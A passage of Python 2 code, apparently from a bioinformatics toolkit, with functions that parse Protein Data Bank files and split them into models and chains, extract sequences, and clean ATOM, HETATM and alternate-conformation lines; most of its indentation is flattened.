print 'Huh? the PDB file header claims there are ' + str( models ) + ' models but the PDB file has ' + str( temp ) + ' models...\nUsing the ACTUAL number of models (' + str( temp ) + ')'
models = temp
# check from reading the CHAIN
if not complexes:
        print 'No chain/subunit information found in the header (or no header),\nassuming all individual sequences are unique i.e. if complex AB has a duplicate copy CD, this will make A, B, C, and D instead of AB and CD'
# complexes = temp # unecessary, automatically happens below...
# add all new ids
temp = struct[0].child_dict.keys() # it better have at least 1 model...
# for the nucleic case...
if has_nucleic:
# HERE!
# remove nucleic lines...
for i in xrange( len( complexes ) ):
for j in nucleic_chains:
if j in complexes[i]:
complexes[i] = complexes[i].replace( j ,'' )
# sanity check...
complexes = [i for i in complexes if i]
# assume all models contain all chains...idk how this would ever NOT occur...
# this also produces a directory for EACH chain as the default behavior!!!
complexes += [i for i in temp if i and not i in complexes and not i in nucleic_chains]
else:
# normal protein stuff
complexes += [i for i in temp if i and not i in complexes]
# okay...this should be figured out...but isn't that big of a deal
# found with 1JGO
    # print complexes
    # complexes = [i for i in complexes if i]
################################
# CREATE AND FILL SUBDIRECTORIES
# again, this step is skipped for pure nucleic acid...
# exit condition, only 1 model and 1 chain
if models > 1 or len( complexes ) > 1:
# over the models
for model in struct.child_dict.keys():
# over the chains
for complx in complexes:
# print '='*60 + complx
# remove nucleic subunits
# HERE!
if has_nucleic:
for chain in nucleic_chains:
complx = complx.replace( chain , '' ) # delete the chain from the complex
# check that all members are present
chains = struct[model].child_dict.keys()
missing = [l for l in complx if not l in chains]
# report this!
if missing:
# add models bool for str here?
                    print 'Expected model ' + str( model + 1 ) + ' to have chains ' + complx + ' but it is missing chains ' + ', '.join( missing ) + '!'
# create the new directory
# only number if more than 1 model
dir_name = complx + str( model + 1 )*bool( models - 1 )
new_dir = os.path.split( root_name )[0] + '/' + dir_name
print 'Creating the subdirectory ' + os.path.relpath( new_dir )
os.mkdir( new_dir )
# create a copy of the complex, only the chains of interest
# make an empty structure
temp = Structure( 'temp' )
temp_model = Model( model ) # and an empty model
temp.add( temp_model )
# add the complex
for chain in complx:
temp[model].add( struct[model][chain] )
# get the chain sequence
seqid = dir_name + ('_model_' + str( model + 1 ))*bool( models - 1 ) + '_chain_' + chain
seq_filename = new_dir + '/' + os.path.split( root_name )[-1] + ('_model_' + str( model + 1 ))*bool( models - 1 ) + '_chain_' + chain + '.' + seqformat_extension_map[seqformat]
description = '(from model ' + str( model + 1 ) + ')'
temp_seq = extract_protein_sequence_from_pdb( temp , True , # MUST insert disorder...
seq_filename , seqid , description , model , chain ,
True , seqformat , protein_alphabet , seqformat_extension_map )
# also, make sure at least one copy (from the first model) is in the main dir
seq_filename = root_name + '_chain_' + chain + '.' + seqformat_extension_map[seqformat]
if not os.path.exists( seq_filename ):
print 'Putting a copy of the sequence in the new directory'
# assumes all the models have the same sequence
write_sequence( temp_seq , seq_filename , seqformat ,
os.path.split( root_name )[-1] + ' chain ' + chain ,
description , protein_alphabet , seqformat_extension_map )
# write out the model+chain
writer.set_structure( temp )
print 'Writing a copy of model ' + str( model + 1 ) + ' chain(s) ' + complx + ' to ' + new_dir + '.pdb'
writer.save( new_dir + '/' + dir_name + '.pdb' )#, selection )
                # also write a cleaned PDB file, only ATOM lines
clean_ATOM_lines_from_pdb( new_dir + '/' + dir_name + '.pdb' )
# also write any alternate conformations
clean_alternate_conformations_from_pdb( new_dir + '/' + dir_name + '.pdb' )
# also get specific HETATMs...this is getting bulky...
clean_HETATM_lines_from_pdb( new_dir + '/' + dir_name + '.pdb' )
# no need to clean DNA
else:
# only 1 model AND only 1 chain
# still write it please :)
model = 0
chain = complexes[0]
# may seem silly, but this edge case will prevent needless re-parsing
# get the chain sequence
seqid = os.path.split( root_name )[-1] + '_chain_' + complexes[0]
extract_protein_sequence_from_pdb( struct , True ,
seqid + '.' + seqformat_extension_map[seqformat] , seqid , '' ,
model , chain , True ,
seqformat = seqformat , alphabet = protein_alphabet , seqformat_extension_map = seqformat_extension_map )
# debug summary...
temp = os.listdir( os.getcwd() )
temp.sort()
print 'New Files in the ' + root_name + ' directory :\n' + '\n'.join( ['\t'+ i for i in temp] )
    # change back to the original directory
os.chdir( original_dir ) # yeah...its hacky
return best_guess
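# example usage (illustrative; assumes "1YY8.pdb" exists locally):
#     best_guess = process_pdb( '1YY8.pdb' )
# this creates a "1YY8" directory holding the header, numbering map, cleaned
# PDB(s), sequences, and per-chain subdirectories, and returns the best-guess PDB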
################################################################################
# HEADER STUFF
# extract header text
def extract_header_from_pdb( pdb_filename , header_filename = 'header.txt' ):
# write the header (?)
# get the header
f = open( pdb_filename , 'r' )
header = ''
while True: # should error from f.next() if improper input...
# next line
line = f.next()
# exit condition
if 'ATOM' == line[:4] or 'MODEL' == line[:5] or 'HETATM' == line[:6]:
break
header += line
f.close()
# write the header
if header_filename:
print 'Writing a copy of the header lines to the file ' + header_filename
f = open( header_filename , 'w' )
f.write( header )
f.close()
return header
# return any predicted chain pairs
def extract_duplicate_chains_from_pdb_header( pdb_filename ):
# load the raw data
f = open( pdb_filename , 'r' )
complexes = []
keep_going = True
while keep_going:
# next line
line = f.next()
# ...think about this...
# check if chain info, extract the matching subunits
if line[:6] == 'COMPND' and 'CHAIN:' in line:
duplicate = line.split( 'CHAIN: ' )[-1].replace( ';' , '' ).strip().split( ', ' ) # ignore ";\n"
if len( duplicate ) > 1:
complexes.append( duplicate )
# stop condition
elif not ('HEADER' in line or 'TITLE' in line or 'COMPND' in line or 'CAVEAT' in line):
keep_going = False
f.close()
# convert complexes
if complexes:
if not sum( [len( c ) - len( complexes[0] ) for c in complexes] ):
# all are the same length
complexes = [''.join( [c[i] for c in complexes] ) for i in xrange( len( complexes[0] ) )]
else:
# uh oh...
# could be all should be unique...which puts us in exception land anyway
# assume that last listed are aberrantly unpaired
lowest = min( [len( c ) for c in complexes] )
temp = [''.join( [c[i] for c in complexes] ) for i in xrange( lowest )]
for c in complexes:
temp += c[lowest:]
complexes = temp
return complexes
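# example of the pairing logic above (hypothetical COMPND records):
#     COMPND lines listing "CHAIN: A, C" and "CHAIN: B, D" yield
#     complexes == ['AB' , 'CD'] , one complex string per duplicate copy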
# return number of models, scanned from header
def extract_number_of_models_from_pdb_header( pdb_filename ):
# get the number of models
f = open( pdb_filename , 'r' )
models = 1
keep_going = True
while keep_going:
# next line
line = f.next()
# check for models
if line[:6] == 'NUMMDL':
models = int( line.replace( 'NUMMDL' , '' ).strip() )
keep_going = False
elif line[:4] == 'ATOM':
keep_going = False
f.close()
return models
# return resolution, scanned from header
# other information? R-value? R-free?
# other places to extract the quality...?
def extract_resolution_information_from_pdb_header( pdb_filename ):
# load it
f = open( pdb_filename , 'r' )
# ewww....should be a "for" loop that breaks...
keep_going = True
experimental_data = 'X-RAY DIFFRACTION'
resolution = None
while keep_going:
# next line
line = f.next()
# check for models
if line[:6] == 'EXPDTA':
# print 'found exp data'
experimental_data = line[6:].strip()
        # the remark number is right-justified in the record name, i.e. "REMARK   2"
        elif line[:10] == 'REMARK   2':
# check for NMR
# print 'found remark'
# print line
if 'ANGSTROMS' in line:
# print 'found resolution'
resolution = float( line[23:].strip().split( 'ANGSTROMS' )[0].strip() )
keep_going = False
elif line[:4] == 'ATOM':
keep_going = False
f.close()
return resolution , experimental_data
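# example usage (illustrative; assumes "1YY8.pdb" exists locally):
#     resolution , method = extract_resolution_information_from_pdb_header( '1YY8.pdb' )
#     resolution stays None when no "ANGSTROMS" record is found (e.g. NMR structures)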
# return a map of HETATM codes to their chemical names, scanned from header
def extract_HETNAM_from_pdb_header( pdb_filename ):
    # get the HETNAM records
f = open( pdb_filename , 'r' )
hetname_map = {}
keep_going = True
while keep_going:
# next line
line = f.next()
# check for models
if line[:6] == 'HETNAM':
hetname = line[6:].strip().split( ' ' )
hetkey = hetname[0]
hetname = ''.join( [i + ' ' for i in hetname[1:]] )[:-1]
hetname_map[hetkey] = hetname
elif line[:4] == 'ATOM':
keep_going = False
f.close()
return hetname_map
################################################################################
# DIVIDE AND JOIN
# split or join PDB files
# simple wrapper
def morph_atomName2element( atomName ):
"""
Returns the element in <atomName>
raw PDB atomNames are supposed to have the element as the first character
"""
element = atomName[:2].strip()
# remove number characters
for i in '0123456789':
element = element.replace( i , '' )
return element
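# example usage:
#     morph_atomName2element( ' CA ' )    # -> 'C' (alpha carbon, NOT calcium)
#     morph_atomName2element( '1HB ' )    # -> 'H'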
# make sure a filename, Structure, or Model returns the Model of interest
# not tested recently...
def load_pdb( pdb , model = 0 ):
"""
Returns the <model> of <pdb> if its a Structure object (or a filename)
"""
# sort the input
if isinstance( pdb , str ):
# filename
print 'Input filename ' + pdb + ', loading the structure now'
parser = PDBParser( PERMISSIVE = 1 )
pdb = parser.get_structure( 'temp' , pdb )
# default to first one if empty...
if not model:
model = pdb.child_dict.keys()[0]
print 'extracting the first model (' + str( model ) + ')'
pdb = pdb[model] # get the first model
# tried doing this a prettier way...
# check for specific methods and data types for clues...
elif isinstance( pdb.child_dict.keys()[0] , int ):
# its a Biopython structure
# default to first one if empty...
if not model:
model = pdb.child_dict.keys()[0]
print 'Input Biopython Structure, extracting the first model (' + str( model ) + ')'
pdb = pdb[model] # get the first model
elif 'child_dict' in dir( pdb ):
# ...could be any number of things...including what we want!
# hooray! everything is okay
        pass
else:
# not supported!
raise IOError( 'That data structure is not currently supported...' )
return pdb
# check the PDB for models and split into separate PDBs
def split_pdb_into_models( pdb_filename ):
"""
Writes a single PDB file for every model in <pdb_filename>
uses the Biopython PDBParser and PDBIO
"""
# make tools
parser = PDBParser( PERMISSIVE = 1 )
writer = PDBIO()
pdb_filename = os.path.abspath( pdb_filename )
root_name = get_root_filename( pdb_filename )
struct = parser.get_structure( root_name , pdb_filename )
# over the models
for i in struct.child_dict.keys():
# get just the model
temp = Structure( 'temp' )
temp.add( struct[i] )
# write it
writer.set_structure( temp )
out_filename = root_name + '_model_' + str( i + 1 ) + '.pdb'
print 'Model ' + str( i + 1 ) + ' written to ' + out_filename
writer.save( out_filename )
# check the PDB for chains and split into separate PDBs
def split_pdb_into_chains( pdb_filename , model = 0 , export = False ):
"""
Writes a single PDB file for every chain in <pdb_filename>
uses the Biopython PDBParser and PDBIO
"""
# make tools
parser = PDBParser( PERMISSIVE = 1 )
writer = PDBIO()
pdb_filename = os.path.abspath( pdb_filename )
root_name = get_root_filename( pdb_filename )
struct = parser.get_structure( root_name , pdb_filename )
# assume there is only 1 model
# over the chains
chains = {}
for i in struct[model].child_dict.keys():
# get just the model
temp = Structure( 'temp' )
temp_mod = Model( 0 )
        temp_mod.add( struct[model][i] )
temp.add( temp_mod )
# write it
writer.set_structure( temp )
out_filename = root_name + '_chain_' + i + '.pdb'
# chains.append( 'Chain ' + i + ' written to ' + out_filename )
chains[i] = out_filename
writer.save( out_filename )
# debug output
for i in chains.keys():
print 'Chain ' + i + ' written to ' + chains[i]
# optionally export
if export:
return chains
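# example usage (illustrative; assumes "1YY8.pdb" exists locally):
#     chains = split_pdb_into_chains( '1YY8.pdb' , export = True )
#     for c in sorted( chains.keys() ):
#         print 'chain ' + c + ' -> ' + chains[c]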
# add all files together in the provided order
# not tested recently...
def join_pdb_files( files , out_filename = '' ):
"""
Combines the contents of all <files> and writes it out to <out_filename>
a very simple method
"""
# default filename
out_filename_provided = True
if not out_filename:
out_filename_provided = False
text = ''
for i in files:
# open it
f = open( i , 'r' )
# add the text
text += f.read()
f.close()
# check if the name should be added
if not out_filename_provided:
if '.' in i:
out_filename += i[:i.find( '.' )]
else:
out_filename += i
# write the bastard love child
f = open( out_filename , 'w' )
f.write( text )
f.close()
# extract the chains from the PDB
# only considers ATOM lines, mainly for use with clean_nucleic_acid_lines_from_pdb
def extract_chains_from_pdb( pdb_filename , only = ['ATOM'] ):
"""
Returns the chains found in <pdb_filename>
Only consider lines starting with <only>
"""
pdb_filename = os.path.abspath( pdb_filename )
if os.path.exists( pdb_filename ):
# load the data
f = open( pdb_filename , 'r' )
data = [i for i in f.xreadlines() if i[:6].strip() in only]
f.close()
# find unique chains
chains = []
for i in data:
if not i[21] in chains:
chains.append( i[21] )
return chains
else:
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
# extract the name mapping
def extract_numbering_map_from_pdb( pdb_filename , out_filename = '' , only = ['ATOM'] ):
"""
Returns a map (dict) from residues in <pdb_filename> that are 1-indexed
and a reverse map (dict)
Only consider lines starting with <only>
Optionally write the results to <out_filename>
"""
pdb_filename = os.path.abspath( pdb_filename )
if os.path.exists( pdb_filename ):
# load the raw data
f = open( pdb_filename , 'r' )
d = [i for i in f.xreadlines() if i[:6].strip() in only]
f.close()
# extract dict of pairs
pdb_map = {}
reverse_map = {}
count = 0
text = ''
for i in d:
# basic info
chain = i[21]
resseq = i[22:26].strip()
icode = i[26] # the icode
key = chain + resseq + icode
if not key in pdb_map.keys():
count += 1
pdb_map[key] = count
reverse_map[count] = key
text += key + '\t' + str( count ) + '\n'
# optionally write to file
# no defaulting!
if out_filename:
# default filename
# f = open( get_root_filename( pdb_filename ) + '_PDB_numbering.txt' , 'w' )
# f.write( ''.join( [i +'\t'+ str( pdb_map[i] ) +'\n' for i in pdb_map.keys()] ) )
print 'Writing the PDB numbering of ' + pdb_filename + ' to ' + out_filename
f = open( out_filename , 'w' )
f.write( text )
f.close()
return pdb_map , reverse_map
else:
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
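# example usage (illustrative values; assumes "1YY8.pdb" exists locally):
#     pdb_map , reverse_map = extract_numbering_map_from_pdb( '1YY8.pdb' )
#     keys are chain + resSeq + iCode, so e.g. pdb_map['A100 '] -> 42 and reverse_map[42] -> 'A100 '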
# extract a protein sequence from a PDB
# make this better? specify the chain?
# for now, only works if single chain...
def extract_protein_sequence_from_pdb( pdb , include_breaks = True ,
out_filename = '' , seqid = '' , description = '' ,
model = 0 , chain = 'A' , export = True ,
seqformat = SEQFORMAT , alphabet = ProteinAlphabet ,
seqformat_extension_map = SEQFORMAT_EXTENSION_MAP ):
"""
Returns the protein sequences found in <pdb> in <model>
Optionally <export> the sequence
Optionally write to <out_filename> with <seqid>
note: does NOT scan for protein chains, it only dumps out the full
protein sequence in the PDB file
individual chains can be extracted using process_pdb
"""
# ensure pdb is proper, must be a model
pdb = load_pdb( pdb , model ) # necessary model?
# format the chain input
if not isinstance( chain , list ):
chain = [chain]
# over the desired chains
# ugh...this should all be rewritten...
sequences = []
for c in chain:
# get it
if include_breaks:
# extract the sequence as a Biopython Seq object
# convert the model into a Structure, for getting the sequence
for_seq = Structure( 'temp' )
# ...oh yeah...must be model 0 and up >:[
temp_model = Model( 0 ) # hardcoded...
for_seq.add( temp_model )
# for ch in pdb.child_dict.keys():
# copy it all over directly
for_seq[0].add( pdb[c] )
            # gap regions marked as "|"
seq_builder = PPBuilder()
pp = seq_builder.build_peptides( for_seq )
seq = Seq( '|'.join( [str( frag.get_sequence() ) for frag in pp] ) , alphabet )
# for frag in pp:
# seq += frag.get_sequence() + '|' # already a Biopython Seq
seqr = SeqRecord( seq )
seqr.description = description + ' missing residues (gap regions as \"|\")'*( '|' in seq )
else:
# just iterate and extract!
seq = Seq( ''.join( [three2one[i.resname] for i in pdb.get_residues() if i.resname in three2one.keys() and i.get_parent().id == c] ) , alphabet )
seqr = SeqRecord( seq )
seqr.description = description
# prepare to write
# seq = seq[:-1]
# seqr.description = 'missing residues (gap regions as \"|\")'*( '|' in seq ) # no need if no gaps
seqr.id = seqid
sequences.append( seqr )
# optionally write the sequence
if out_filename:
        # the records already carry ids/descriptions, so pass alphabet and map by keyword
        write_sequence( sequences , out_filename , seqformat , alphabet = alphabet , seq_format_map = seqformat_extension_map )
# optionally export the sequence
if export:
return get_sequence( sequences )
# return str( seq )
# extract and write a file from the PDB
def extract_nucleic_acid_sequences_from_pdb( pdb_filename , out_filename = '' , NA = NUCLEIC_SEQUENCE_LETTERS_MAP , DNA = NA_CODES['DNA'] , seqformat = SEQFORMAT , alphabet = DNAAlphabet , seqformat_extension_map = SEQFORMAT_EXTENSION_MAP ):
"""
Returns the protein sequences found in <pdb_filename>
Only consider resNames in <NA>
Optionally write to <out_filename>
"""
pdb_filename = os.path.abspath( pdb_filename )
if os.path.exists( pdb_filename ):
# load the data
f = open( pdb_filename , 'r' )
d = f.readlines()
f.close()
# print about fails/assumptions
        print 'Extracting nucleic sequences from ' + os.path.relpath( pdb_filename ) + '\nFor visibility, this method assumes A LOT!\n1. nucleotides are identified by unique resSeq codes (with a proper resName)\n2. sequences are identified by unique chain IDs\n3. RNA is the default state\n4. DNA is identified by \"DG\" (etc.) OR \"T\" resi codes\n5. All sequences are continuous\n6. All sequences are recorded 5\' -> 3\' (and written to file in this order)'
# check for nucleic lines - No, do while parsing
# extract sequence
NA_keys = NA.keys()
DNA_keys = DNA.keys()
# molecule = 'RNA'
molecule_types = {}
sequences = {}
last = None
for line in d:
# must have C1 and a nucleic resi code to be considered a nucleotide
resname = line[17:20].strip()
resseq = line[22:27].strip() # resseq
if (line[:5] == 'ATOM ' or line[:4] == 'TER ') and resname in NA_keys:# and line[13:16].strip() == 'C1\'':
# only novel lines
if resseq == last:
continue
last = resseq # if the remainder will execute...
# check for DNA
chain = line[21]
if [True for i in DNA_keys if i in resname]:
# its DNA
molecule_types[chain] = 'DNA'
# consider the whole chain DNA if ANY of the exclusive codes are present
# sometimes DNA is abbreviated without the "d" to designate "deoxy"
# remember the letter
if chain in sequences.keys():
# add the letter
sequences[chain] += NA[resname] # map the code
else:
# create it as well
sequences[chain] = NA[resname]
molecule_types[chain] = 'RNA' # default
# default out name
root_filename = get_root_filename( pdb_filename )
if not out_filename:
out_filename = root_filename
# write the sequences
for chain in sequences.keys():
# verify its not just a nucleotide
seq = sequences[chain]
if len( seq ) > 1:
# determine the molecule type
            # record a proper id
seqr = SeqRecord( Seq( seq , alphabet ) ) # even if RNA (?)
seqr.id = os.path.split( root_filename )[-1] + '_chain_' + chain
seqr.description = molecule_types[chain]
# oh yeah, write it, prints out by itself
out_filename = seqr.id + '.' + seqformat_extension_map[seqformat]
write_sequence( seqr , out_filename , seqformat , alphabet , seqformat_extension_map )
return sequences , molecule_types # empty dict will evaluate as false
else:
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
################################################################################
# CLEANING METHODS
# HERE !!!
# a dirty input produces a cleaned output file :)
# default behavior is to produce output
# removes non ATOM lines from <pdb_file> and writes to <out_file>
def clean_ATOM_lines_from_pdb( pdb_filename , out_filename = '' , HETATM_include = [] , excluded_atoms = ['CN'] , accepted_fields = ['ATOM ' , 'TER '] ):
"""
Writes all lines in the PDB file <pdb_filename> beginning with "ATOM" or
"TER" into <out_filename> (defaults to <pdb_file>.clean.pdb)
Optionally include HETATM lines with resNames in <HETATM_include>
Returns True if successful
...pretty much the same as:
grep "ATOM" pdb_filename > out_filename
example:
        clean_ATOM_lines_from_pdb('1YY9.pdb')
See also:
Pose
Pose.dump_pdb
pose_from_pdb
pose_from_rcsb
"""
# get the file rootname
pdb_filename = os.path.abspath( pdb_filename )
root_filename = get_root_filename( pdb_filename )
if not root_filename: # in case it is improper, no "."
root_filename = pdb_filename
# an optional argument for PDB files not ending in .pdb
# if not edit:
# edit = 255
# if the file exists
if os.path.exists( pdb_filename ):
# find all ATOM and TER lines
f = open( pdb_filename , 'r' )
data = f.readlines()
f.close()
good = []
for i in data:
if [True for j in accepted_fields if i[:len( j )] == j]:
# if i[:5] == 'ATOM ' or i[:4] == 'TER ':
# add your preference rules for ligands, DNA, water, etc.
# check for excluded atoms
if i[12:16].strip() in excluded_atoms:
# skip it, do not add to the list
continue
good.append( i )
elif i[:6] == 'HETATM' and i[17:20] in HETATM_include:
                # save for later, more processing
good.append( i )
# stop condition
if not good:
# tell the user and exit
print 'No ATOM or HETATM lines in ' + os.path.relpath( pdb_filename )
return False
# default output file to <pdb_filename>.clean.pdb
if not out_filename:
out_filename = root_filename + '.clean.pdb'
# write the found lines
print 'if the file ' + os.path.relpath( out_filename ) + ' already exists, it will be overwritten!'
f = open( out_filename , 'w' )
f.writelines( good )
f.close()
print 'PDB file ' + os.path.relpath( pdb_filename ) + ' successfully cleaned, non-ATOM lines removed\nclean data written to ' + os.path.relpath( out_filename )
return out_filename
else:
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
# if you would prefer a simpler call using grep, it looks something like this
# os.system("grep \"ATOM\" %s.pdb > %s.clean.pdb"%(pdb_file[:edit],pdb_file[:edit]))
# split the ATOM lines, only look for DNA lines
def clean_nucleic_acid_lines_from_pdb( pdb_filename , out_filename = '' , NA = NUCLEIC_SEQUENCE_LETTERS_MAP.keys() ):
"""
Scan <pdb_filename> for any nucleic acid lines and writes these to
<out_filename>
defines nucleic acid resNames (three letter codes) as those with
stripped codes in <NA>
default definition of nucleic acid resNames can be adjusted in settings.py
"""
# get the file rootname
pdb_filename = os.path.abspath( pdb_filename )
root_filename = get_root_filename( pdb_filename )
if not root_filename: # in case it is improper, no "."
root_filename = pdb_filename
# if the file exists
if os.path.exists( pdb_filename ):
# find all ATOM and TER lines
f = open( pdb_filename , 'r' )
data = f.readlines()
f.close()
good = []
for i in data:
if (i[:5] == 'ATOM ' or i[:4] == 'TER ') and i[17:20].strip() in NA:
# add your preference rules for ligands, DNA, water, etc.
good.append( i )
# stop condition
if not good:
# tell the user and exit
print 'No nucleic acid lines in ' + os.path.relpath( pdb_filename )
return False
# default output file to <pdb_filename>.clean.pdb
if not out_filename:
out_filename = root_filename + '.nucleic.pdb'
# write the found lines
print 'if the file ' + os.path.relpath( out_filename ) + ' already exists, it will be overwritten!'
f = open( out_filename , 'w' )
f.writelines( good )
f.close()
print 'PDB file ' + os.path.relpath( pdb_filename ) + ' successfully cleaned, DNA/RNA lines extracted\nclean data written to ' + os.path.relpath( out_filename )
return out_filename
else:
print 'No such file or directory named '+ os.path.relpath( pdb_filename )
return False
# split the ATOM lines, only look for not RNA/DNA lines
def clean_protein_lines_from_pdb( pdb_filename , out_filename = '' , NA = NUCLEIC_SEQUENCE_LETTERS_MAP.keys() ):
"""
    Scan <pdb_filename> for any nucleic acid lines and writes all "ATOM" lines
    that are NOT nucleic acids to <out_filename>
defines nucleic acid resNames (three letter codes) as those with
stripped codes in <NA>
default definition of nucleic acid resNames can be adjusted in settings.py
"""
# get the file rootname
pdb_filename = os.path.abspath( pdb_filename )
root_filename = get_root_filename( pdb_filename )
if not root_filename: # in case it is improper, no "."
root_filename = pdb_filename
# if the file exists
if os.path.exists( pdb_filename ):
# find all ATOM and TER lines
f = open( pdb_filename , 'r' )
data = f.readlines()
f.close()
good = []
for i in data:
if (i[:5] == 'ATOM ' or i[:4] == 'TER ') and not i[17:20].strip() in NA:
# add your preference rules for ligands, DNA, water, etc.
good.append( i )
# stop condition
if not good:
# tell the user and exit
print 'No protein lines in ' + os.path.relpath( pdb_filename )
return False
# default output file to <pdb_filename>.clean.pdb
if not out_filename:
out_filename = root_filename + '.protein.pdb'
# write the found lines
print 'if the file ' + os.path.relpath( out_filename ) + ' already exists, it will be overwritten!'
f = open( out_filename , 'w' )
f.writelines( good )
f.close()
print 'PDB file ' + os.path.relpath( pdb_filename ) + ' successfully cleaned, protein lines extracted\nclean data written to ' + os.path.relpath( out_filename )
return True
else:
print 'No such file or directory named '+ os.path.relpath( pdb_filename )
return False
# scan for HETATMs, rewrite without all these lines, record specific ones
def clean_HETATM_lines_from_pdb( pdb_filename , out_filename = '' , only = '' , write_unique = True ):
"""
Writes all lines in the PDB file <pdb_filename> beginning with "HETATM"
into <out_filename> (defaults to <pdb_filename>.hetatm.pdb)
Optionally write PDB files for all unique residue type codes in the HETATM
lines if <write_unique> is True (default True)
OR
Writes all lines in the PDB file <pdb_filename> beginning with "HETATM"
AND with the resName <only>
Returns True if successful
"""
# get the file rootname
pdb_filename = os.path.abspath( pdb_filename )
root_filename = get_root_filename( pdb_filename )
if not root_filename: # in case it is improper, no "."
root_filename = pdb_filename
# if the file exists
if os.path.exists( pdb_filename ):
# find all HETATM
f = open( pdb_filename , 'r' )
data = f.readlines()
f.close()
good = []
unique = []
for i in data:
resn = i[17:20].strip()
if i[:6] == 'HETATM' and (not only or resn in only):
                # save for later, more processing
good.append( i )
# look for unique resn names
if not only and not resn in unique:
unique.append( resn )
# stop condition
if not good:
# tell the user and exit
print 'No HETATM lines in ' + os.path.relpath( pdb_filename )
return False
# default output file to <pdb_filename>.clean.pdb
if not out_filename:
if not only:
out_filename = root_filename + '.hetatm.pdb'
elif only in WATER_CONVERSION.keys(): # just waters...
out_filename = root_filename.replace( '.hetatm' , '' ) + '.waters.pdb'
else:
# its anything else, name based on the code
out_filename = root_filename.replace( '.hetatm' , '' ) + '.' + only + '.pdb'
# write the found lines
print 'if the file ' + os.path.relpath( out_filename ) + ' already exists, it will be overwritten!'
f = open( out_filename , 'w' )
f.writelines( good )
f.close()
# change this!
if not only:
print 'PDB ' + os.path.relpath( pdb_filename ) + ' successfully cleaned, non-HETATM lines removed\nclean data written to ' + os.path.relpath( out_filename )
else:
print 'All ' + only + ' lines in PDB file ' + os.path.relpath( pdb_filename ) + ' written to ' + os.path.relpath( out_filename )
# optionally redo for all unique members
if not only and write_unique:
if len( unique ) > 1:
# do them all
# for resn in unique:
# clean_HETATM_lines_from_pdb( out_filename , '' , resn )
unique_filenames = [clean_HETATM_lines_from_pdb( out_filename , '' , resn ) for resn in unique]
return out_filename , unique_filenames
else:
# only 1 HETATM type...
unique = unique[0]
print 'Only 1 type of HETATM found, ' + unique
if unique in WATER_CONVERSION.keys():
unique = 'waters'
# print 'Renaming ' + root_filename + '.hetatm.pdb to ' + root_filename + '.' + unique + '.pdb'
# shutil.move( root_filename + '.hetatm.pdb' , root_filename + '.' + unique + '.pdb' )
temp = root_filename + '.' + unique + '.pdb'
print 'Renaming ' + os.path.relpath( out_filename ) + ' to ' + os.path.relpath( temp )
shutil.move( out_filename , temp )
out_filename = temp
return out_filename
else:
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
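# example usage (sketch kept as comments; "1YY9.pdb" is an assumed input):
#     write every HETATM record, plus one file per unique resName
#         clean_HETATM_lines_from_pdb( '1YY9.pdb' )
#     or pull out just the waters
#         clean_HETATM_lines_from_pdb( '1YY9.pdb' , only = 'HOH' )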
# scan for alternate location fields
def clean_alternate_conformations_from_pdb( pdb_filename , remove_identifier = True ):
"""
Writes PDB files for each of the alternate conformations found in
<pdb_filename>
"""
# get the file rootname
pdb_filename = os.path.abspath( pdb_filename )
root_filename = get_root_filename( pdb_filename )
if not root_filename: # in case it is improper, no "."
root_filename = pdb_filename
# verify it exists
if not os.path.exists( pdb_filename ):
# for pipelines etc.
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
# find all alternate conformations
f = open( pdb_filename , 'r' )
lines = f.readlines()
f.close()
# for storage
non_alternating = ['']
alternate_conformations = []
last_line_alternate = False
index = 0
alternate_index = -1
conformation_names = []
resis = set()
for i in lines:
# skip non ATOM lines...fix this later to support header?
if not i[:6].strip() in ['ATOM' , 'HETATM']:
last_line_alternate = False
continue
# sort it
if i[16].strip():
conformation = i[16]
resis.add( i[21] +':'+ i[22:27].strip() )
# optionally remove the alternate conformation identifier
if remove_identifier:
i = i[:16] + ' ' + i[17:]
# did we just transition into an alt conf region?
if last_line_alternate:
# still in the same region
if not conformation in alternate_conformations[alternate_index].keys():
alternate_conformations[alternate_index][conformation] = i
if not conformation in conformation_names:
conformation_names.append( conformation )
else:
alternate_conformations[alternate_index][conformation] += i
else:
# in a new region
# if alternate_conformations:
# conformation_names = list( set( conformation_names + alternations_conformations[-1].keys() ) )
# number_of_conformations = max( number_of_conformations , len( alternate_conformations[-1].keys() ) )
alternate_index += 1
alternate_conformations.append( {conformation : i} )
if not conformation in conformation_names:
conformation_names.append( conformation )
last_line_alternate = True
else:
# did we just transition into an alt conf region?
if last_line_alternate:
# entered a new region
index += 1
non_alternating.append( i )
else:
# in the same region
non_alternating[index] += i
last_line_alternate = False
# exit condition
conformation_names.sort() # intuitive order...
if not conformation_names:
print 'No alternate conformations detected (17th column)'
return False
else:
print 'found ' + str( len( conformation_names ) ) + ' alternate conformations: ' + ', '.join( conformation_names )
print 'alternate locations found for residues: ' + ', '.join( list( resis ) )
# print index , alternate_index , number_of_conformations
# write out the alternate conformations
conformation_filenames = []
for i in conformation_names:
# make a text by building from fragments
text = ''
for j in xrange( len( non_alternating ) - 2 ):
text += non_alternating[j]
if i in alternate_conformations[j].keys():
text += alternate_conformations[j][i]
else:
# default to the "first" alt conf ID
key = 0
while not conformation_names[key] in alternate_conformations[j].keys():
key += 1
key = conformation_names[key]
text += alternate_conformations[j][key]
# add edge case
text += non_alternating[-1]
# write the file
out_filename = root_filename + '_conformation_' + i +'.pdb'
print 'writing conformation ' + i + ' out to ' + os.path.relpath( out_filename ) + ' ...'
f = open( out_filename , 'w' )
f.write( text )
f.close()
conformation_filenames.append( out_filename )
return conformation_filenames
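# example usage (sketch kept as comments; assumes "1YY9.pdb" contains
# altLoc records):
#     conformations = clean_alternate_conformations_from_pdb( '1YY9.pdb' )
#     if conformations:
#         print 'wrote ' + str( len( conformations ) ) + ' single-conformation PDBs'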
################################################################################
# CONVERTERS
# rewrite the hetatm lines in the pdb file
def convert_pdb_resnames_to_ATOM_lines( hetatm_pdb_filename , out_filename = '' , report_filename = '' , conversion = three2three ):
"""
Rewrites all HETATM lines in <hetatm_pdb_filename> found as keys in
the dict <conversion> and replaces them with their values
also rewrites the "HETATM" record as "ATOM "
used to convert HETATM lines that are proxies for amino acids
"""
hetatm_pdb_filename = os.path.abspath( hetatm_pdb_filename )
# handle defaults
if not out_filename:
# override
print 'no output filename provided, overwriting ' + hetatm_pdb_filename
out_filename = hetatm_pdb_filename
# make sure it exists
